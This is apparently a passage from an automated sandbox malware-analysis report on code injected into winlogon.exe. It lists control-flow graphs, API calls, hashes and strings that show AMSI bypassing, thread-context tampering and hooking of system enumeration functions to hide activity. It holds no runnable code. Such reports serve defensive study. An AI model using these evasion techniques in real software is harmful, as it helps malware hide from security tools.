                          • Instruction Fuzzy Hash: A7711637A51B5986FB119F65E8A0AD833A5FF84B8DF811111DE4D43B28DE3AC584C392

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                          • API String ID: 1735320900-4225371247
                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction ID: 28d763e4b3efa6897c284255733b152927e4241509441b1b3e99965525c9534b
                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                          • Instruction Fuzzy Hash: 115171B2E91B4EA5FB03DB64E860FD43322BF4074DFC00956A40942565EE7AC25AD3E3

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 740688525-1880043860
                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction ID: 75b8f92d8bfc56aebef74cbf69bbb5d49082de77f78bb49cf1e15368de41eb5e
                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                          • Instruction Fuzzy Hash: 91519C72B4170C51FA169B96A800BE57261BF48BB9FC847249E39473D4EF3AD505C783

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 151 1ca7d1e6270-1ca7d1e6297 152 1ca7d1e6299-1ca7d1e62a8 151->152 153 1ca7d1e62ab-1ca7d1e62b6 GetCurrentThreadId 151->153 152->153 154 1ca7d1e62b8-1ca7d1e62bd 153->154 155 1ca7d1e62c2-1ca7d1e62c9 153->155 156 1ca7d1e66ef-1ca7d1e6706 call 1ca7d1e8070 154->156 157 1ca7d1e62db-1ca7d1e62ef 155->157 158 1ca7d1e62cb-1ca7d1e62d6 call 1ca7d1e60a0 155->158 161 1ca7d1e62fe-1ca7d1e6304 157->161 158->156 162 1ca7d1e63d5-1ca7d1e63f6 161->162 163 1ca7d1e630a-1ca7d1e6313 161->163 171 1ca7d1e655f-1ca7d1e6570 call 1ca7d1e7bff 162->171 172 1ca7d1e63fc-1ca7d1e641c GetThreadContext 162->172 166 1ca7d1e6315-1ca7d1e6358 call 1ca7d1f3a40 163->166 167 1ca7d1e635a-1ca7d1e63cd call 1ca7d1e4c50 call 1ca7d1e4bf0 call 1ca7d1e4bb0 163->167 180 1ca7d1e63d0 166->180 167->180 183 1ca7d1e6575-1ca7d1e657b 171->183 173 1ca7d1e6422-1ca7d1e6443 172->173 174 1ca7d1e655a 172->174 173->174 182 1ca7d1e6449-1ca7d1e6452 173->182 174->171 180->161 186 1ca7d1e6454-1ca7d1e6465 182->186 187 1ca7d1e64d2-1ca7d1e64e3 182->187 188 1ca7d1e6581-1ca7d1e65d8 VirtualProtect FlushInstructionCache 183->188 189 1ca7d1e663e-1ca7d1e664e 183->189 191 1ca7d1e6467-1ca7d1e647c 186->191 192 1ca7d1e64cd 186->192 195 1ca7d1e6555 187->195 196 1ca7d1e64e5-1ca7d1e6503 187->196 193 1ca7d1e6609-1ca7d1e6639 call 1ca7d1e7fdc 188->193 194 1ca7d1e65da-1ca7d1e65e4 188->194 198 1ca7d1e6650-1ca7d1e6657 189->198 199 1ca7d1e665e-1ca7d1e666a call 1ca7d1e5530 189->199 191->192 202 1ca7d1e647e-1ca7d1e64c8 call 1ca7d1e40b0 SetThreadContext 191->202 192->195 193->183 194->193 203 1ca7d1e65e6-1ca7d1e6601 call 1ca7d1e4ad0 194->203 196->195 204 1ca7d1e6505-1ca7d1e6550 call 1ca7d1e4040 call 1ca7d1e7c1d 196->204 198->199 200 1ca7d1e6659 call 1ca7d1e4b20 198->200 212 1ca7d1e666f-1ca7d1e6675 199->212 200->199 202->192 203->193 204->195 216 1ca7d1e66b7-1ca7d1e66d5 212->216 217 1ca7d1e6677-1ca7d1e66b5 ResumeThread call 1ca7d1e7fdc 212->217 220 1ca7d1e66e9 216->220 221 1ca7d1e66d7-1ca7d1e66e6 216->221 217->212 220->156 221->220
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                          • Instruction ID: d05defe120a4688720ce9ecdd58902b16fb62d512cdd13eabecee864d7326d01
                          • Opcode Fuzzy Hash: 62de8192582035d3c174f7317d52215c3d31caf77dd5d103fa0b8274126801a3
                          • Instruction Fuzzy Hash: 1DD1CC37644B8C82FA71DB0AE49079A77A0F788B89F900512EACD47765DF3DC541CB82

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 223 1ca7d1e1e3c-1ca7d1e1e60 LoadLibraryA GetProcAddress 224 1ca7d1e1e62-1ca7d1e1e6d SleepEx 223->224 225 1ca7d1e1e6f-1ca7d1e1e73 223->225 224->224
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProcSleep
                          • String ID: AmsiScanBuffer$amsi.dll
                          • API String ID: 188063004-3248079830
                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction ID: 3f2b23ccba4f01efca1837d1ec0e5ebe98186c814f68ab41dbead1d3c470ee30
                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                          • Instruction Fuzzy Hash: FFD06272ED3708D5F90B6B51E8A4FD43262BF54B09FC50855C50E01264DE2EC659D3D3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 226 1ca7d1e5810-1ca7d1e583c 227 1ca7d1e583e-1ca7d1e5846 226->227 228 1ca7d1e584d-1ca7d1e5856 226->228 227->228 229 1ca7d1e5858-1ca7d1e5860 228->229 230 1ca7d1e5867-1ca7d1e5870 228->230 229->230 231 1ca7d1e5872-1ca7d1e587a 230->231 232 1ca7d1e5881-1ca7d1e588a 230->232 231->232 233 1ca7d1e5896-1ca7d1e58a1 GetCurrentThreadId 232->233 234 1ca7d1e588c-1ca7d1e5891 232->234 236 1ca7d1e58a3-1ca7d1e58a8 233->236 237 1ca7d1e58ad-1ca7d1e58b4 233->237 235 1ca7d1e5e13-1ca7d1e5e1a 234->235 236->235 238 1ca7d1e58b6-1ca7d1e58bc 237->238 239 1ca7d1e58c1-1ca7d1e58ca 237->239 238->235 240 1ca7d1e58d6-1ca7d1e58e2 239->240 241 1ca7d1e58cc-1ca7d1e58d1 239->241 242 1ca7d1e58e4-1ca7d1e5909 240->242 243 1ca7d1e590e-1ca7d1e5965 call 1ca7d1e5e20 * 2 240->243 241->235 242->235 248 1ca7d1e5967-1ca7d1e596e 243->248 249 1ca7d1e597a-1ca7d1e5983 243->249 250 1ca7d1e5976 248->250 251 1ca7d1e5970 248->251 252 1ca7d1e5995-1ca7d1e599e 249->252 253 1ca7d1e5985-1ca7d1e5992 249->253 255 1ca7d1e59e6-1ca7d1e59ea 250->255 254 1ca7d1e59f0-1ca7d1e59f6 251->254 256 1ca7d1e59b3-1ca7d1e59d8 call 1ca7d1e7fa0 252->256 257 1ca7d1e59a0-1ca7d1e59b0 252->257 253->252 258 1ca7d1e59f8-1ca7d1e5a14 call 1ca7d1e4ad0 254->258 259 1ca7d1e5a25-1ca7d1e5a2b 254->259 255->254 267 1ca7d1e59de 256->267 268 1ca7d1e5a6d-1ca7d1e5a82 call 1ca7d1e4400 256->268 257->256 258->259 269 1ca7d1e5a16-1ca7d1e5a1e 258->269 262 1ca7d1e5a55-1ca7d1e5a68 259->262 263 1ca7d1e5a2d-1ca7d1e5a4c call 1ca7d1e7fdc 259->263 262->235 263->262 267->255 273 1ca7d1e5a84-1ca7d1e5a8c 268->273 274 1ca7d1e5a91-1ca7d1e5a9a 268->274 269->259 273->255 275 1ca7d1e5aac-1ca7d1e5afa call 1ca7d1f40e0 274->275 276 1ca7d1e5a9c-1ca7d1e5aa9 274->276 279 1ca7d1e5b02-1ca7d1e5b0a 275->279 276->275 280 1ca7d1e5c17-1ca7d1e5c1f 279->280 281 1ca7d1e5b10-1ca7d1e5bfb call 1ca7d1e7b80 279->281 283 1ca7d1e5c63-1ca7d1e5c6b 280->283 284 1ca7d1e5c21-1ca7d1e5c34 call 1ca7d1e4cd0 280->284 292 1ca7d1e5bff-1ca7d1e5c0e call 1ca7d1e47a0 281->292 293 1ca7d1e5bfd 281->293 285 1ca7d1e5c77-1ca7d1e5c86 283->285 286 1ca7d1e5c6d-1ca7d1e5c75 283->286 295 1ca7d1e5c38-1ca7d1e5c61 284->295 296 1ca7d1e5c36 284->296 290 1ca7d1e5c88 285->290 291 1ca7d1e5c8f 285->291 286->285 289 1ca7d1e5c94-1ca7d1e5ca1 286->289 298 1ca7d1e5ca4-1ca7d1e5cf9 call 1ca7d1f3a40 289->298 299 1ca7d1e5ca3 289->299 290->291 291->289 302 1ca7d1e5c12 292->302 303 1ca7d1e5c10 292->303 293->280 295->280 296->283 305 1ca7d1e5d08-1ca7d1e5da1 call 1ca7d1e4c50 call 1ca7d1e4bb0 VirtualProtect 298->305 306 1ca7d1e5cfb-1ca7d1e5d03 298->306 299->298 302->279 303->280 311 1ca7d1e5da3-1ca7d1e5da8 GetLastError 305->311 312 1ca7d1e5db1-1ca7d1e5e11 305->312 311->312 312->235
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                          • Instruction ID: c4fb3315ca78ad6c88cc819d43d3822fc1bb5b5b3bb77f142309b4c7efaf3f70
                          • Opcode Fuzzy Hash: 4460526132078707f03e529f17315c9f8621164f7a74e4fe9c23d362e9fa087d
                          • Instruction Fuzzy Hash: A802F933659B8886F761CB15F49079AB7A0F7C4799F500015EA8E87BA8DF7DC484CB42

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: 4b0ed5361dff3adcda6195a5dc2af1083a8005ab2c1b804d84ff7dccd2579ba4
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: 72115E37A5574493FB268B61E404A9AB7B0FB44B89F440026DA4D43798EF7EC954C7C3
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000003.1759332183.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_3_1ca7d1b0000_winlogon.jbxd
                          Similarity
                          • API ID: Virtual$Protect$AllocLibraryLoad
                          • String ID:
                          • API String ID: 3316853933-0
                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction ID: fab056db1c559ce614da3632ff79b2cd998d8c65ade00f4a8a9fe06968449f78
                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                          • Instruction Fuzzy Hash: B291F5B3F4139887EB558F29D400FA9B395FF55B98F9481249E4D07B88DA36D822C742

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Virtual$AllocQuery
                          • String ID:
                          • API String ID: 31662377-0
                          • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                          • Instruction ID: 31ae54dde4bc601838691571fe20e4d19e02a82357ab131b83e5d70d6c66b96e
                          • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                          • Instruction Fuzzy Hash: BD317533A55B4981FA32CB65F050B8A72A4F78878DF900535E5CD46B94DF3EC1408B83

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32 ref: 000001CA7D1E3A35
                          • PathFindFileNameW.SHLWAPI ref: 000001CA7D1E3A44
                            • Part of subcall function 000001CA7D1E3F88: StrCmpNIW.SHLWAPI(?,?,?,000001CA7D1E272F), ref: 000001CA7D1E3FA0
                            • Part of subcall function 000001CA7D1E3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3EDB
                            • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F0E
                            • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F2E
                            • Part of subcall function 000001CA7D1E3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F47
                            • Part of subcall function 000001CA7D1E3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000001CA7D1E3A5B), ref: 000001CA7D1E3F68
                          • CreateThread.KERNELBASE ref: 000001CA7D1E3A8B
                            • Part of subcall function 000001CA7D1E1E74: GetCurrentThread.KERNEL32 ref: 000001CA7D1E1E7F
                            • Part of subcall function 000001CA7D1E1E74: CreateThread.KERNELBASE ref: 000001CA7D1E2043
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2049
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2055
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2061
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E206D
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2079
                            • Part of subcall function 000001CA7D1E1E74: TlsAlloc.KERNEL32 ref: 000001CA7D1E2085
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                          • String ID:
                          • API String ID: 2779030803-0
                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                          • Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                          • String ID:
                          • API String ID: 3733156554-0
                          • Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                          • Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
                          • Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                          • Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

                          Control-flow Graph

                          APIs
                            • Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
                            • Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
                          • SleepEx.KERNELBASE ref: 000001CA7D1E1BDF
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
                            • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
                            • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: CloseOpen$Heap$AllocProcessSleep
                          • String ID:
                          • API String ID: 948135145-0
                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                          • Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 409 1ca7d21f370-1ca7d21f39f VirtualProtect
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                          • Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                          • Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                          • Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 408 1ca7d1ef370-1ca7d1ef39f VirtualProtect
                          APIs
                          Memory Dump Source
                          • Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                          • Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                          • Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
